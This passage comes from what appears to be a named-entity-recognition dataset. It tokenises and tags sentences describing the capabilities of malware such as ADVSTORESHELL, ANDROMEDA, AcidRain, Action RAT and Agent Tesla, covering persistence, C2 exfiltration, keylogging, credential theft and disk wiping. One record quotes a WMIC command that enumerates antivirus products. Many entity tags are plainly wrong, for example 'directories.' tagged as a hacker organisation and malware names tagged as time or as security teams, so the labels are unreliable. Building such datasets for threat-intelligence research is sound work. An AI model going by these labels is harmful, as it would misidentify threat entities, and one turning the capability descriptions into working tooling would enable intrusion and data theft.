- "O" - ] - }, - { - "tokens": [ - "A", - "variant", - "of", - "ADVSTORESHELL", - "encrypts", - "some", - "C2", - "with", - "RSA." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Some", - "variants", - "of", - "ADVSTORESHELL", - "achieve", - "persistence", - "by", - "registering", - "the", - "payload", - "as", - "a", - "Shell", - "Icon", - "Overlay", - "handler", - "COM", - "object." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Tool", - "B-SecTeam", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "exfiltrates", - "data", - "over", - "the", - "same", - "channel", - "used", - "for", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "can", - "delete", - "files", - "and", - "directories." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "can", - "list", - "files", - "and", - "directories." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "can", - "perform", - "keylogging." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "stores", - "output", - "from", - "command", - "execution", - "in", - "a", - ".dat", - "file", - "in", - "the", - "%TEMP%", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "is", - "capable", - "of", - "setting", - "and", - "deleting", - "Registry", - "values." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "is", - "capable", - "of", - "starting", - "a", - "process", - "using", - "CreateProcess." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Most", - "of", - "the", - "strings", - "in", - "ADVSTORESHELL", - "are", - "encrypted", - "with", - "an", - "XOR-based", - "algorithm;", - "some", - "strings", - "are", - "also", - "encrypted", - "with", - "3DES", - "and", - "reversed.", - "API", - "function", - "names", - "are", - "also", - "reversed,", - "presumably", - "to", - "avoid", - "detection", - "in", - "memory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "can", - "list", - "connected", - "devices." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "can", - "list", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "can", - "enumerate", - "registry", - "keys." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "achieves", - "persistence", - "by", - "adding", - "itself", - "to", - "the", - "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "Registry", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "has", - "used", - "rundll32.exe", - "in", - "a", - "Registry", - "value", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "collects,", - "compresses,", - "encrypts,", - "and", - "exfiltrates", - "data", - "to", - "the", - "C2", - "server", - "every", - "10", - "minutes." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C2", - "traffic", - "from", - "ADVSTORESHELL", - "is", - "encrypted,", - "then", - "encoded", - "with", - "Base64", - "encoding." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "variant", - "of", - "ADVSTORESHELL", - "encrypts", - "some", - "C2", - "with", - "3DES." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "can", - "run", - "Systeminfo", - "to", - "gather", - "information", - "about", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "connects", - "to", - "port", - "80", - "of", - "a", - "C2", - "server", - "using", - "Wininet", - "API.", - "Data", - "is", - "exchanged", - "via", - "HTTP", - "POSTs." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "ADVSTORESHELL", - "can", - "create", - "a", - "remote", - "shell", - "and", - "run", - "a", - "given", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ANDROMEDA", - "can", - "download", - "additional", - "payloads", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "ANDROMEDA", - "has", - "been", - "delivered", - "through", - "a", - "LNK", - "file", - "disguised", - "as", - "a", - "folder." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ANDROMEDA", - "has", - "been", - "installed", - "to", - "`C:\\Temp\\TrustedInstaller.exe`", - "to", - "mimic", - "a", - "legitimate", - "Windows", - "installer", - "service." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ANDROMEDA", - "can", - "inject", - "into", - "the", - "`wuauclt.exe`", - "process", - "to", - "perform", - "C2", - "actions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ANDROMEDA", - "can", - "establish", - "persistence", - "by", - "dropping", - "a", - "sample", - "of", - "itself", - "to", - "`C:\\ProgramData\\Local", - "Settings\\Temp\\mskmde.com`", - "and", - "adding", - "a", - "Registry", - "run", - "key", - "to", - "execute", - "every", - "time", - "a", - "user", - "logs", - "on." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ANDROMEDA", - "has", - "been", - "spread", - "via", - "infected", - "USB", - "keys." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "ANDROMEDA", - "has", - "the", - "ability", - "to", - "make", - "GET", - "requests", - "to", - "download", - "files", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "ASPXSpy", - "is", - "a", - "Web", - "shell.", - "The", - "ASPXTool", - "version", - "used", - "by", - "Threat", - "Group-3390", - "has", - "been", - "deployed", - "to", - "accessible", - "servers", - "running", - "Internet", - "Information", - "Services", - "(IIS)." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AcidRain", - "performs", - "an", - "in-depth", - "wipe", - "of", - "the", - "target", - "filesystem", - "and", - "various", - "attached", - "storage", - "devices", - "through", - "either", - "a", - "data", - "overwrite", - "or", - "calling", - "various", - "IOCTLS", - "to", - "erase", - "it." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AcidRain", - "iterates", - "over", - "device", - "file", - "identifiers", - "on", - "the", - "target,", - "opens", - "the", - "device", - "file,", - "and", - "either", - "overwrites", - "the", - "file", - "or", - "calls", - "various", - "IOCTLS", - "commands", - "to", - "erase", - "it." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AcidRain", - "identifies", - "specific", - "files", - "and", - "directories", - "in", - "the", - "Linux", - "operating", - "system", - "associated", - "with", - "storage", - "devices." - ], - "ner_tags": [ - "B-Time", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AcidRain", - "reboots", - "the", - "target", - "system", - "once", - "the", - "various", - "wiping", - "processes", - "are", - "complete." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Action", - "RAT", - "can", - "collect", - "local", - "data", - "from", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Action", - "RAT", - "can", - "use", - "Base64", - "to", - "decode", - "actor-controlled", - "C2", - "server", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Action", - "RAT", - "has", - "the", - "ability", - "to", - "collect", - "drive", - "and", - "file", - "information", - "on", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Action", - "RAT", - "has", - "the", - "ability", - "to", - "download", - "additional", - "payloads", - "onto", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Action", - "RAT's", - "commands,", - "strings,", - "and", - "domains", - "can", - "be", - "Base64", - "encoded", - "within", - "the", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Action", - "RAT", - "can", - "identify", - "AV", - "products", - "on", - "an", - "infected", - "host", - "using", - "the", - "following", - "command:", - "`cmd.exe", - "WMIC", - "/Node:localhost", - "/Namespace:\\\\root\\SecurityCenter2", - "Path", - "AntiVirusProduct", - "Get", - "displayName", - "/Format:List`." - ], - "ner_tags": [ - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Action", - "RAT", - "has", - "the", - "ability", - "to", - "collect", - "the", - "hostname,", - "OS", - "version,", - "and", - "OS", - "architecture", - "of", - "an", - "infected", - "host." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Action", - "RAT", - "has", - "the", - "ability", - "to", - "collect", - "the", - "MAC", - "address", - "of", - "an", - "infected", - "host." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Action", - "RAT", - "has", - "the", - "ability", - "to", - "collect", - "the", - "username", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Action", - "RAT", - "can", - "use", - "HTTP", - "to", - "communicate", - "with", - "C2", - "servers." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Action", - "RAT", - "can", - "use", - "`cmd.exe`", - "to", - "execute", - "commands", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Action", - "RAT", - "can", - "use", - "WMI", - "to", - "gather", - "AV", - "products", - "installed", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "B-HackOrg", - "B-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AdFind", - "can", - "enumerate", - "domain", - "users." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AdFind", - "can", - "enumerate", - "domain", - "groups." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "AdFind", - "can", - "gather", - "information", - "about", - "organizational", - "units", - "(OUs)", - "and", - "domain", - "trusts", - "from", - "Active", - "Directory." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AdFind", - "has", - "the", - "ability", - "to", - "query", - "Active", - "Directory", - "for", - "computers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "AdFind", - "can", - "extract", - "subnet", - "information", - "from", - "Active", - "Directory." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "can", - "encrypt", - "data", - "with", - "3DES", - "before", - "sending", - "it", - "over", - "to", - "a", - "C2", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "the", - "ability", - "to", - "use", - "form-grabbing", - "to", - "extract", - "data", - "from", - "web", - "data", - "forms." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "can", - "steal", - "data", - "from", - "the", - "victim’s", - "clipboard." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "the", - "ability", - "to", - "extract", - "credentials", - "from", - "configuration", - "or", - "support", - "files." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "the", - "ability", - "to", - "steal", - "credentials", - "from", - "FTP", - "clients", - "and", - "wireless", - "profiles." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "can", - "gather", - "credentials", - "from", - "a", - "number", - "of", - "browsers." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "the", - "ability", - "to", - "extract", - "credentials", - "from", - "the", - "Registry." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "the", - "ability", - "to", - "decrypt", - "strings", - "encrypted", - "with", - "the", - "Rijndael", - "symmetric", - "encryption", - "algorithm." - ], - "ner_tags": [ - "O", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "the", - "capability", - "to", - "kill", - "any", - "running", - "analysis", - "processes", - "and", - "AV", - "software." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "routines", - "for", - "exfiltration", - "over", - "SMTP,", - "FTP,", - "and", - "HTTP." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "exploited", - "Office", - "vulnerabilities", - "such", - "as", - "CVE-2017-11882", - "and", - "CVE-2017-8570", - "for", - "execution", - "during", - "delivery." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "created", - "hidden", - "folders." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "used", - "<code>ProcessWindowStyle.Hidden</code>", - "to", - "hide", - "windows." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "can", - "download", - "additional", - "files", - "for", - "execution", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "can", - "log", - "keystrokes", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "can", - "collect", - "account", - "information", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "used", - "SMTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "been", - "executed", - "through", - "malicious", - "e-mail", - "attachments" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "can", - "achieve", - "persistence", - "by", - "modifying", - "Registry", - "key", - "entries." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-HackOrg", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "had", - "its", - "code", - "obfuscated", - "in", - "an", - "apparent", - "attempt", - "to", - "make", - "analysis", - "difficult.", - "Agent", - "Tesla", - "has", - "used", - "the", - "Rijndael", - "symmetric", - "encryption", - "algorithm", - "to", - "encrypt", - "strings." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "can", - "list", - "the", - "current", - "running", - "processes", - "on", - "the", - "system." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "used", - "process", - "hollowing", - "to", - "create", - "and", - "manipulate", - "processes", - "through", - "sections", - "of", - "unmapped", - "memory", - "by", - "reallocating", - "that", - "space", - "with", - "its", - "malicious", - "code." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "can", - "inject", - "into", - "known,", - "vulnerable", - "binaries", - "on", - "targeted", - "hosts." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "can", - "add", - "itself", - "to", - "the", - "Registry", - "as", - "a", - "startup", - "program", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "dropped", - "RegAsm.exe", - "onto", - "systems", - "for", - "performing", - "malicious", - "activity." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "achieved", - "persistence", - "via", - "scheduled", - "tasks." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "can", - "capture", - "screenshots", - "of", - "the", - "victim’s", - "desktop." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "primary", - "delivered", - "mechanism", - "for", - "Agent", - "Tesla", - "is", - "through", - "email", - "phishing", - "messages." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "can", - "collect", - "the", - "system's", - "computer", - "name", - "and", - "also", - "has", - "the", - "capability", - "to", - "collect", - "information", - "on", - "the", - "processor,", - "memory,", - "OS,", - "and", - "video", - "card", - "from", - "the", - "system." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "can", - "collect", - "the", - "IP", - "address", - "of", - "the", - "victim", - "machine", - "and", - "spawn", - "instances", - "of", - "netsh.exe", - "to", - "enumerate", - "wireless", - "settings." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "can", - "collect", - "the", - "username", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "can", - "collect", - "the", - "timestamp", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "can", - "access", - "the", - "victim’s", - "webcam", - "and", - "record", - "video." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "the", - "ability", - "to", - "perform", - "anti-sandboxing", - "and", - "anti-virtualization", - "checks." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "used", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "can", - "collect", - "names", - "and", - "passwords", - "of", - "all", - "Wi-Fi", - "networks", - "to", - "which", - "a", - "device", - "has", - "previously", - "connected." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent", - "Tesla", - "has", - "used", - "wmi", - "queries", - "to", - "gather", - "information", - "from", - "the", - "system." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent.btz", - "saves", - "system", - "information", - "into", - "an", - "XML", - "file", - "that", - "is", - "then", - "XOR-encoded." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent.btz", - "creates", - "a", - "file", - "named", - "thumb.dd", - "on", - "all", - "USB", - "flash", - "drives", - "connected", - "to", - "the", - "victim.", - "This", - "file", - "contains", - "information", - "about", - "the", - "infected", - "system", - "and", - "activity", - "logs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent.btz", - "attempts", - "to", - "download", - "an", - "encrypted", - "binary", - "from", - "a", - "specified", - "domain." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent.btz", - "drops", - "itself", - "onto", - "removable", - "media", - "devices", - "and", - "creates", - "an", - "autorun.inf", - "file", - "with", - "an", - "instruction", - "to", - "run", - "that", - "file.", - "When", - "the", - "device", - "is", - "inserted", - "into", - "another", - "system,", - "it", - "opens", - "autorun.inf", - "and", - "loads", - "the", - "malware." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent.btz", - "collects", - "the", - "network", - "adapter’s", - "IP", - "and", - "MAC", - "address", - "as", - "well", - "as", - "IP", - "addresses", - "of", - "the", - "network", - "adapter’s", - "default", - "gateway,", - "primary/secondary", - "WINS,", - "DHCP,", - "and", - "DNS", - "servers,", - "and", - "saves", - "them", - "into", - "a", - "log", - "file." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Agent.btz", - "obtains", - "the", - "victim", - "username", - "and", - "saves", - "it", - "to", - "a", - "file." - ], - "ner_tags": 